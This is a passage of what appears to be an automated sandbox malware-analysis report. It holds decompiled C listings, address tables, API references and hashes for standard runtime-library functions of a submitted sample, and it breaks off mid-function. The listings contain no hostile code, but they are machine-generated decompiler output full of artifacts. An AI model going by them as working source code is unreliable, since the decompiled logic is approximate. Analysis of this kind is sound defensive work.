                                                              • Instruction Fuzzy Hash: E551F572A0020A6BDB205EA58C81EBB37B9EF44314B16453EFD05F6281FB7CEC548669
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004042F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 181COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 63%
                                                              			E004042F7(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _t78;
				signed int _t80;
				char _t81;
				intOrPtr* _t82;
				void* _t86;
				signed int _t88;
				signed int _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t96;
				signed char _t100;
				signed char _t103;
				signed char _t109;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t124;
				signed int _t125;
				signed int _t126;
				signed int _t130;
				signed int _t131;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr _t139;
				intOrPtr _t140;

				_t1 =  &_a4; // 0x40474b
				_t78 = E004065AB( *_t1);
				_v36 = _t78;
				_t130 = _t78 >> 6;
				_t80 = (_t78 & 0x0000003f) * 0x38;
				_v40 = _t130;
				_t117 =  *((intOrPtr*)(0x418ec0 + _t130 * 4));
				_v32 = _t117;
				_v28 = _t80;
				_v16 = 0;
				_t81 =  *((intOrPtr*)(_t117 + _t80 + 0x29));
				_v24 = _t81;
				if(_t81 != 1) {
					_v12 = 1;
				} else {
					_t140 = 2;
					_v12 = _t140;
				}
				_t82 = _a4;
				_t118 =  *((intOrPtr*)(_t82 + 8));
				_v20 = _t118;
				if(_t118 != 0) {
					_t135 = _v32;
					asm("cdq");
					_v8 = _t130;
					asm("cdq");
					_t122 =  *_t82 -  *((intOrPtr*)(_t82 + 4)) + _v20;
					_t85 = _v8;
					_v20 =  *_t82 -  *((intOrPtr*)(_t82 + 4)) + _v20;
					asm("adc eax, edx");
					_t131 = _v28;
					__eflags =  *((char*)(_t135 + _t131 + 0x28));
					_t136 = _v12;
					if( *((char*)(_t135 + _t131 + 0x28)) < 0) {
						_t137 = _v36;
						_t86 = E004068B6(_v36, 0, 0, 2, _a24);
						__eflags = _t86 - _a8;
						if(_t86 != _a8) {
							L14:
							_t88 = E004068B6(_t137, _a8, _a12, 0, _a24) & _t131;
							_t131 = _t131 | 0xffffffff;
							__eflags = _t88 - _t131;
							if(_t88 != _t131) {
								__eflags = _v8;
								if(__eflags > 0) {
									L22:
									asm("cdq");
									_v8 =  *((intOrPtr*)(_a4 + 0x18));
									L23:
									_t91 = _v28;
									_t124 =  *((intOrPtr*)(0x418ec0 + _v40 * 4));
									__eflags =  *(_t91 + _t124 + 0x28) & 0x00000004;
									if(( *(_t91 + _t124 + 0x28) & 0x00000004) == 0) {
										_t125 = _v8;
										L29:
										_t114 = _v12;
										_t92 = E00410B40(_t125, _t131, _t114, _v16);
										_push(_v16);
										L30:
										_push(_t114);
										_push(_a20);
										_push(_a16);
										_t93 = E00410B40();
										asm("sbb edx, edi");
										asm("adc edx, [ebp+0x10]");
										return _t93 - _t92 + _a8;
									}
									_t96 = _v24;
									__eflags = _t96 - 1;
									if(_t96 == 1) {
										L26:
										_push(2);
										_pop(1);
										L27:
										_t126 = _v8;
										L13:
										_t125 = _t126 + 1;
										asm("adc edx, edi");
										goto L29;
									}
									__eflags = _t96 - 2;
									if(_t96 != 2) {
										goto L27;
									}
									goto L26;
								}
								_v8 = 0x200;
								if(__eflags < 0) {
									L19:
									_t100 =  *(_a4 + 0xc) >> 6;
									__eflags = 1 & _t100;
									if((1 & _t100) == 0) {
										goto L22;
									}
									_t103 =  *(_a4 + 0xc) >> 8;
									__eflags = 1 & _t103;
									if((1 & _t103) != 0) {
										goto L22;
									}
									_t131 = 0;
									goto L23;
								}
								__eflags = _v20 - 0x200;
								if(_v20 > 0x200) {
									goto L22;
								}
								goto L19;
							}
							return _t131;
						}
						__eflags = _t131 - _a12;
						if(_t131 != _a12) {
							goto L14;
						}
						_t139 = _a4;
						_t125 = E0040466D( *((intOrPtr*)(_t139 + 4)), _v20 +  *((intOrPtr*)(_t139 + 4)), _v24) + _v20;
						asm("adc edx, [ebp-0x4]");
						_t109 =  *(_t139 + 0xc) >> 5;
						__eflags = 1 & _t109;
						if((1 & _t109) == 0) {
							goto L29;
						}
						_t110 = _v24;
						__eflags = _t110 - 1;
						if(_t110 == 1) {
							L12:
							_push(2);
							_pop(1);
							goto L13;
						}
						__eflags = _t110 - 2;
						if(_t110 != 2) {
							goto L13;
						}
						goto L12;
					}
					_t115 = _v16;
					_t92 = E00410B40(_t122, _t85, _t136, _t115);
					_push(_t115);
					_t114 = _t136;
					goto L30;
				} else {
					return _a8;
				}
			}







































                                                              0x00404302
                                                              0x00404305
                                                              0x0040430c
                                                              0x00404312
                                                              0x00404315
                                                              0x0040431c
                                                              0x0040431f
                                                              0x00404328
                                                              0x0040432b
                                                              0x0040432e
                                                              0x00404331
                                                              0x00404335
                                                              0x0040433a
                                                              0x00404344
                                                              0x0040433c
                                                              0x0040433e
                                                              0x0040433f
                                                              0x0040433f
                                                              0x00404347
                                                              0x0040434a
                                                              0x0040434d
                                                              0x00404352
                                                              0x00404364
                                                              0x00404369
                                                              0x0040436c
                                                              0x00404372
                                                              0x00404373
                                                              0x00404375
                                                              0x00404378
                                                              0x0040437b
                                                              0x0040437d
                                                              0x00404383
                                                              0x00404388
                                                              0x0040438b
                                                              0x004043a4
                                                              0x004043ac
                                                              0x004043b4
                                                              0x004043b7
                                                              0x00404404
                                                              0x00404414
                                                              0x00404419
                                                              0x0040441c
                                                              0x0040441e
                                                              0x00404427
                                                              0x0040442a
                                                              0x0040445b
                                                              0x00404461
                                                              0x00404462
                                                              0x00404465
                                                              0x00404468
                                                              0x0040446b
                                                              0x00404472
                                                              0x00404477
                                                              0x0040448f
                                                              0x00404492
                                                              0x00404495
                                                              0x0040449b
                                                              0x004044a0
                                                              0x004044a3
                                                              0x004044a3
                                                              0x004044a4
                                                              0x004044ab
                                                              0x004044ae
                                                              0x004044b5
                                                              0x004044ba
                                                              0x00000000
                                                              0x004044ba
                                                              0x00404479
                                                              0x0040447c
                                                              0x0040447e
                                                              0x00404484
                                                              0x00404484
                                                              0x00404486
                                                              0x00404487
                                                              0x00404487
                                                              0x004043fb
                                                              0x004043fb
                                                              0x004043fd
                                                              0x00000000
                                                              0x004043fd
                                                              0x00404480
                                                              0x00404482
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404482
                                                              0x00404431
                                                              0x00404434
                                                              0x0040443b
                                                              0x00404442
                                                              0x00404445
                                                              0x00404447
                                                              0x00000000
                                                              0x00000000
                                                              0x00404450
                                                              0x00404453
                                                              0x00404455
                                                              0x00000000
                                                              0x00000000
                                                              0x00404457
                                                              0x00000000
                                                              0x00404457
                                                              0x00404436
                                                              0x00404439
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404439
                                                              0x00000000
                                                              0x00404420
                                                              0x004043b9
                                                              0x004043bc
                                                              0x00000000
                                                              0x00000000
                                                              0x004043be
                                                              0x004043d8
                                                              0x004043de
                                                              0x004043e2
                                                              0x004043e5
                                                              0x004043e7
                                                              0x00000000
                                                              0x00000000
                                                              0x004043ed
                                                              0x004043f0
                                                              0x004043f2
                                                              0x004043f8
                                                              0x004043f8
                                                              0x004043fa
                                                              0x00000000
                                                              0x004043fa
                                                              0x004043f4
                                                              0x004043f6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004043f6
                                                              0x0040438d
                                                              0x00404394
                                                              0x00404399
                                                              0x0040439a
                                                              0x00000000
                                                              0x00404354
                                                              0x00000000
                                                              0x00404357

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00404394
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040449B
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004044AE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: KG@
                                                              • API String ID: 885266447-1248469857
                                                              • Opcode ID: 2bd672f4b93b8e84d5363833de7c8a2a3724070b457573ba0a9a5d6950f16b0b
                                                              • Instruction ID: 0f44e613f5f007d60bd1686208b68d596087c3bd5a455358ea95eefcffa573ce
                                                              • Opcode Fuzzy Hash: 2bd672f4b93b8e84d5363833de7c8a2a3724070b457573ba0a9a5d6950f16b0b
                                                              • Instruction Fuzzy Hash: 805197B1A00149AFCF14DF99C881AEEBBB6EF89314F14806AE955B7381D338ED41DB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402633 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00402633(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00406308(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                                              0x00402640
                                                              0x00402648
                                                              0x0040267d
                                                              0x0040264a
                                                              0x00402653
                                                              0x00000000
                                                              0x0040267a
                                                              0x00402679
                                                              0x00402679

                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,004025E4,00000000,?,00418CC0,?,?,?,00402787,00000004,InitializeCriticalSectionEx,00411CF8,InitializeCriticalSectionEx), ref: 00402640
                                                              • GetLastError.KERNEL32(?,004025E4,00000000,?,00418CC0,?,?,?,00402787,00000004,InitializeCriticalSectionEx,00411CF8,InitializeCriticalSectionEx,00000000,?,00402507), ref: 0040264A
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402672
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID: api-ms-
                                                              • API String ID: 3177248105-2084034818
                                                              • Opcode ID: f7040ae3c65c49fa5e55d5c978c18b5f47367d20220597fe9030104652494283
                                                              • Instruction ID: 6d40ff05ccc61d2f07128997f222ac600fb2d99e07b7ce153fe81ee98381cd84
                                                              • Opcode Fuzzy Hash: f7040ae3c65c49fa5e55d5c978c18b5f47367d20220597fe9030104652494283
                                                              • Instruction Fuzzy Hash: C5E01270680204B6EF201F61ED0AF993F55AB14B51F204431FB4DB41F1D7B6E850998C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040C800 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E0040C800(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				signed int _v35;
				signed char _v36;
				void _v44;
				signed char* _v48;
				char _v49;
				long _v56;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				signed char* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				char _v108;
				int _v112;
				intOrPtr _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed char* _t186;
				signed int _t190;
				void* _t196;
				long _t197;
				long _t201;
				signed char* _t207;
				void _t209;
				signed char* _t214;
				void* _t221;
				signed int _t224;
				char* _t228;
				void* _t237;
				long _t243;
				signed int _t244;
				signed char* _t245;
				void* _t255;
				intOrPtr _t261;
				void* _t262;
				struct _OVERLAPPED* _t263;
				intOrPtr* _t264;
				signed int _t265;
				intOrPtr _t266;
				struct _OVERLAPPED* _t274;
				signed int _t276;
				signed char _t281;
				signed int _t285;
				signed char* _t286;
				struct _OVERLAPPED* _t289;
				void* _t292;
				signed int _t293;
				void* _t295;
				struct _OVERLAPPED* _t296;
				signed char* _t298;
				intOrPtr* _t299;
				void* _t300;
				signed int _t301;
				long _t302;
				signed int _t304;
				signed int _t305;
				void* _t306;
				void* _t307;
				void* _t308;

				_push(0xffffffff);
				_push(0x410e99);
				_push( *[fs:0x0]);
				_t307 = _t306 - 0x74;
				_t174 =  *0x418014; // 0xfc7b77c5
				_t175 = _t174 ^ _t305;
				_v20 = _t175;
				_push(_t175);
				 *[fs:0x0] =  &_v16;
				_t177 = _a8;
				_t298 = _a12;
				_t261 = _a20;
				_t265 = (_t177 & 0x0000003f) * 0x38;
				_t285 = _t177 >> 6;
				_v100 = _t298;
				_v64 = _t261;
				_v72 = _t285;
				_v84 = _t265;
				_v104 =  *((intOrPtr*)(_t265 +  *((intOrPtr*)(0x418ec0 + _t285 * 4)) + 0x18));
				_v88 = _a16 + _t298;
				_v112 = GetConsoleOutputCP();
				if( *((char*)(_t261 + 0x14)) == 0) {
					E00404830(_t261, _t285);
				}
				_t299 = _a4;
				_t266 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0xc)) + 8));
				asm("stosd");
				_v116 = _t266;
				asm("stosd");
				asm("stosd");
				_t186 = _v100;
				_t286 = _t186;
				_v48 = _t286;
				if(_t186 < _v88) {
					_t293 = _v84;
					_t263 = 0;
					_v76 = 0;
					while(1) {
						_v49 =  *_t286;
						_t190 = _v72;
						_v68 = _t263;
						_v56 = 1;
						if(_t266 != 0xfde9) {
							goto L22;
						}
						_t274 = _t263;
						_t228 =  *(0x418ec0 + _t190 * 4) + 0x2e + _t293;
						_v76 = _t228;
						while( *_t228 != 0) {
							_t274 =  &(_t274->Internal);
							_t228 = _t228 + 1;
							if(_t274 < 5) {
								continue;
							}
							break;
						}
						_t295 = _v88 - _t286;
						_v56 = _t274;
						if(_t274 <= 0) {
							_t276 =  *((char*)(( *_t286 & 0x000000ff) + 0x4181c8)) + 1;
							_v80 = _t276;
							if(_t276 > _t295) {
								if(_t295 <= 0) {
									goto L44;
								} else {
									_t301 = _v84;
									do {
										 *((char*)( *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _t301 + _t263 + 0x2e)) =  *((intOrPtr*)(_t263 + _t286));
										_t263 =  &(_t263->Internal);
									} while (_t263 < _t295);
									goto L43;
								}
								L52:
							} else {
								_v132 = _t263;
								_v128 = _t263;
								_v60 = _t286;
								_v56 = (_t276 == 4) + 1;
								_t237 = E0040E089( &_v132,  &_v68,  &_v60, (_t276 == 4) + 1,  &_v132, _v64);
								_t308 = _t307 + 0x14;
								if(_t237 != 0xffffffff) {
									_t293 = _v84;
									goto L21;
								}
							}
						} else {
							_t243 =  *((char*)(( *_v76 & 0x000000ff) + 0x4181c8)) + 1;
							_v60 = _t243;
							_t244 = _t243 - _t274;
							_v80 = _t244;
							if(_t244 > _t295) {
								if(_t295 > 0) {
									_t245 = _v48;
									_t302 = _v56;
									do {
										_t281 =  *((intOrPtr*)(_t263 + _t245));
										_t286 =  *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _v84 + _t263;
										_t263 =  &(_t263->Internal);
										_t286[_t302 + 0x2e] = _t281;
									} while (_t263 < _t295);
									L43:
									_t299 = _a4;
								}
								L44:
								 *(_t299 + 4) =  &(( *(_t299 + 4))[_t295]);
							} else {
								_t296 = _t263;
								_t264 = _v76;
								do {
									 *((char*)(_t305 + _t296 - 0x18)) =  *_t264;
									_t296 =  &(_t296->Internal);
									_t264 = _t264 + 1;
								} while (_t296 < _t274);
								_t303 = _v80;
								_t263 = 0;
								if(_v80 > 0) {
									E00402B70( &_v28 + _t274, _t286, _t303);
									_t274 = _v56;
									_t307 = _t307 + 0xc;
								}
								_t293 = _v84;
								_t289 = _t263;
								_t304 = _v72;
								do {
									 *( *((intOrPtr*)(0x418ec0 + _t304 * 4)) + _t293 + _t289 + 0x2e) = _t263;
									_t289 =  &(_t289->Internal);
								} while (_t289 < _t274);
								_t299 = _a4;
								_v108 =  &_v28;
								_v124 = _t263;
								_v120 = _t263;
								_v56 = (_v60 == 4) + 1;
								_t255 = E0040E089( &_v124,  &_v68,  &_v108, (_v60 == 4) + 1,  &_v124, _v64);
								_t308 = _t307 + 0x14;
								if(_t255 != 0xffffffff) {
									L21:
									_t197 =  &(_v48[_v80]) - 1;
									L31:
									_v48 = _t197 + 1;
									_t201 = E00409A30(_v112, _t263,  &_v68, _v56,  &_v44, 5, _t263, _t263);
									_t307 = _t308 + 0x20;
									_v60 = _t201;
									if(_t201 != 0) {
										if(WriteFile(_v104,  &_v44, _t201,  &_v96, _t263) == 0) {
											L50:
											 *_t299 = GetLastError();
										} else {
											_t286 = _v48;
											_t207 =  *((intOrPtr*)(_t299 + 8)) - _v100 + _t286;
											_v76 = _t207;
											 *(_t299 + 4) = _t207;
											if(_v96 >= _v60) {
												if(_v49 != 0xa) {
													L38:
													if(_t286 < _v88) {
														_t266 = _v116;
														continue;
													}
												} else {
													_t209 = 0xd;
													_v92 = _t209;
													if(WriteFile(_v104,  &_v92, 1,  &_v96, _t263) == 0) {
														goto L50;
													} else {
														if(_v96 >= 1) {
															 *((intOrPtr*)(_t299 + 8)) =  *((intOrPtr*)(_t299 + 8)) + 1;
															 *(_t299 + 4) =  &(( *(_t299 + 4))[1]);
															_t286 = _v48;
															_v76 =  *(_t299 + 4);
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L22:
						_t271 =  *(0x418ec0 + _t190 * 4);
						_v80 = _t271;
						if(( *(_t271 + _t293 + 0x2d) & 0x00000004) == 0) {
							_t271 =  *_t286 & 0x000000ff;
							if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc)))) + ( *_t286 & 0x000000ff) * 2)) >= _t263) {
								_push(_v64);
								_push(1);
								_push(_t286);
								goto L29;
							} else {
								_t214 =  &(_t286[1]);
								_v60 = _t214;
								if(_t214 >= _v88) {
									 *((char*)(_v80 + _t293 + 0x2e)) =  *_t286;
									 *( *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _t293 + 0x2d) =  *( *((intOrPtr*)(0x418ec0 + _v72 * 4)) + _t293 + 0x2d) | 0x00000004;
									 *(_t299 + 4) =  &(_v76[1]);
								} else {
									_t221 = E0040B944(_t271, _t286,  &_v68, _t286, 2, _v64);
									_t308 = _t307 + 0x10;
									if(_t221 != 0xffffffff) {
										_t197 = _v60;
										goto L31;
									}
								}
							}
						} else {
							_push(_v64);
							_v36 =  *(_t271 + _t293 + 0x2e) & 0x000000fb;
							_t224 =  *_t286;
							_v35 = _t224;
							 *(_t271 + _t293 + 0x2d) = _t224;
							_push(2);
							_push( &_v36);
							L29:
							_push( &_v68);
							_t196 = E0040B944(_t271, _t286);
							_t308 = _t307 + 0x10;
							if(_t196 != 0xffffffff) {
								_t197 = _v48;
								goto L31;
							}
						}
						goto L51;
					}
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t292);
				_pop(_t300);
				_pop(_t262);
				return E00401BE5(_t299, _t262, _v20 ^ _t305, _t286, _t292, _t300);
				goto L52;
			}















































































                                                              0x0040c805
                                                              0x0040c807
                                                              0x0040c812
                                                              0x0040c813
                                                              0x0040c816
                                                              0x0040c81b
                                                              0x0040c81d
                                                              0x0040c823
                                                              0x0040c827
                                                              0x0040c82d
                                                              0x0040c832
                                                              0x0040c838
                                                              0x0040c83b
                                                              0x0040c83e
                                                              0x0040c841
                                                              0x0040c844
                                                              0x0040c847
                                                              0x0040c851
                                                              0x0040c858
                                                              0x0040c860
                                                              0x0040c86d
                                                              0x0040c870
                                                              0x0040c874
                                                              0x0040c874
                                                              0x0040c87c
                                                              0x0040c881
                                                              0x0040c886
                                                              0x0040c887
                                                              0x0040c88a
                                                              0x0040c88b
                                                              0x0040c88c
                                                              0x0040c88f
                                                              0x0040c891
                                                              0x0040c897
                                                              0x0040c89d
                                                              0x0040c8a0
                                                              0x0040c8a2
                                                              0x0040c8a5
                                                              0x0040c8a7
                                                              0x0040c8aa
                                                              0x0040c8ad
                                                              0x0040c8b0
                                                              0x0040c8bd
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c8ca
                                                              0x0040c8cf
                                                              0x0040c8d1
                                                              0x0040c8d4
                                                              0x0040c8d9
                                                              0x0040c8da
                                                              0x0040c8de
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c8de
                                                              0x0040c8e3
                                                              0x0040c8e5
                                                              0x0040c8ea
                                                              0x0040c99e
                                                              0x0040c99f
                                                              0x0040c9a4
                                                              0x0040cb5e
                                                              0x00000000
                                                              0x0040cb60
                                                              0x0040cb60
                                                              0x0040cb63
                                                              0x0040cb72
                                                              0x0040cb76
                                                              0x0040cb77
                                                              0x00000000
                                                              0x0040cb7b
                                                              0x00000000
                                                              0x0040c9aa
                                                              0x0040c9af
                                                              0x0040c9b5
                                                              0x0040c9bb
                                                              0x0040c9c4
                                                              0x0040c9cf
                                                              0x0040c9d4
                                                              0x0040c9da
                                                              0x0040c9e0
                                                              0x00000000
                                                              0x0040c9e0
                                                              0x0040c9da
                                                              0x0040c8f0
                                                              0x0040c8fd
                                                              0x0040c8fe
                                                              0x0040c901
                                                              0x0040c903
                                                              0x0040c908
                                                              0x0040cb31
                                                              0x0040cb33
                                                              0x0040cb36
                                                              0x0040cb39
                                                              0x0040cb46
                                                              0x0040cb49
                                                              0x0040cb4b
                                                              0x0040cb4c
                                                              0x0040cb50
                                                              0x0040cb54
                                                              0x0040cb54
                                                              0x0040cb54
                                                              0x0040cb57
                                                              0x0040cb57
                                                              0x0040c90e
                                                              0x0040c90e
                                                              0x0040c910
                                                              0x0040c913
                                                              0x0040c915
                                                              0x0040c919
                                                              0x0040c91a
                                                              0x0040c91b
                                                              0x0040c91f
                                                              0x0040c922
                                                              0x0040c926
                                                              0x0040c930
                                                              0x0040c935
                                                              0x0040c938
                                                              0x0040c938
                                                              0x0040c93b
                                                              0x0040c93e
                                                              0x0040c940
                                                              0x0040c943
                                                              0x0040c94c
                                                              0x0040c950
                                                              0x0040c951
                                                              0x0040c958
                                                              0x0040c95e
                                                              0x0040c966
                                                              0x0040c971
                                                              0x0040c976
                                                              0x0040c981
                                                              0x0040c986
                                                              0x0040c98c
                                                              0x0040c9e3
                                                              0x0040c9e9
                                                              0x0040ca7e
                                                              0x0040ca83
                                                              0x0040ca95
                                                              0x0040ca9a
                                                              0x0040ca9d
                                                              0x0040caa2
                                                              0x0040cabd
                                                              0x0040cb9e
                                                              0x0040cba4
                                                              0x0040cac3
                                                              0x0040cac9
                                                              0x0040cacc
                                                              0x0040cace
                                                              0x0040cad1
                                                              0x0040cada
                                                              0x0040cae4
                                                              0x0040cb22
                                                              0x0040cb25
                                                              0x0040cb27
                                                              0x00000000
                                                              0x0040cb27
                                                              0x0040cae6
                                                              0x0040cae8
                                                              0x0040caea
                                                              0x0040cb03
                                                              0x00000000
                                                              0x0040cb09
                                                              0x0040cb0d
                                                              0x0040cb13
                                                              0x0040cb16
                                                              0x0040cb1c
                                                              0x0040cb1f
                                                              0x00000000
                                                              0x0040cb1f
                                                              0x0040cb0d
                                                              0x0040cb03
                                                              0x0040cae4
                                                              0x0040cada
                                                              0x0040cabd
                                                              0x0040caa2
                                                              0x0040c98c
                                                              0x0040c908
                                                              0x00000000
                                                              0x0040c9ef
                                                              0x0040c9ef
                                                              0x0040c9f6
                                                              0x0040ca00
                                                              0x0040ca23
                                                              0x0040ca2f
                                                              0x0040ca60
                                                              0x0040ca63
                                                              0x0040ca65
                                                              0x00000000
                                                              0x0040ca31
                                                              0x0040ca31
                                                              0x0040ca34
                                                              0x0040ca3a
                                                              0x0040cb82
                                                              0x0040cb90
                                                              0x0040cb99
                                                              0x0040ca40
                                                              0x0040ca4a
                                                              0x0040ca4f
                                                              0x0040ca55
                                                              0x0040ca5b
                                                              0x00000000
                                                              0x0040ca5b
                                                              0x0040ca55
                                                              0x0040ca3a
                                                              0x0040ca02
                                                              0x0040ca09
                                                              0x0040ca0c
                                                              0x0040ca0f
                                                              0x0040ca11
                                                              0x0040ca14
                                                              0x0040ca1b
                                                              0x0040ca1d
                                                              0x0040ca66
                                                              0x0040ca69
                                                              0x0040ca6a
                                                              0x0040ca6f
                                                              0x0040ca75
                                                              0x0040ca7b
                                                              0x00000000
                                                              0x0040ca7b
                                                              0x0040ca75
                                                              0x00000000
                                                              0x0040ca00
                                                              0x0040c8a5
                                                              0x0040cba6
                                                              0x0040cbab
                                                              0x0040cbb3
                                                              0x0040cbb4
                                                              0x0040cbb5
                                                              0x0040cbc1
                                                              0x00000000

                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(FC7B77C5,00000000,00000000,?), ref: 0040C863
                                                                • Part of subcall function 00409A30: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0040DBAF,?,00000000,-00000008), ref: 00409A91
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040CAB5
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040CAFB
                                                              • GetLastError.KERNEL32 ref: 0040CB9E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                              • String ID:
                                                              • API String ID: 2112829910-0
                                                              • Opcode ID: 38a055b8fd170a2096d220b3596d05f387b3e6599db676eaaa1279edd9b21f10
                                                              • Instruction ID: afab75ee4df23f5baa2d1639ff9ca2ddc2c0c3524feb2627a88473823ce8a792
                                                              • Opcode Fuzzy Hash: 38a055b8fd170a2096d220b3596d05f387b3e6599db676eaaa1279edd9b21f10
                                                              • Instruction Fuzzy Hash: CED168B5D00248DFCB15CFA8D8C1AEDBBB5EF09314F28822AE455FB391D634A941CB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004030E4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 66%
                                                              			E004030E4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x4165c8);
				E004019C0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
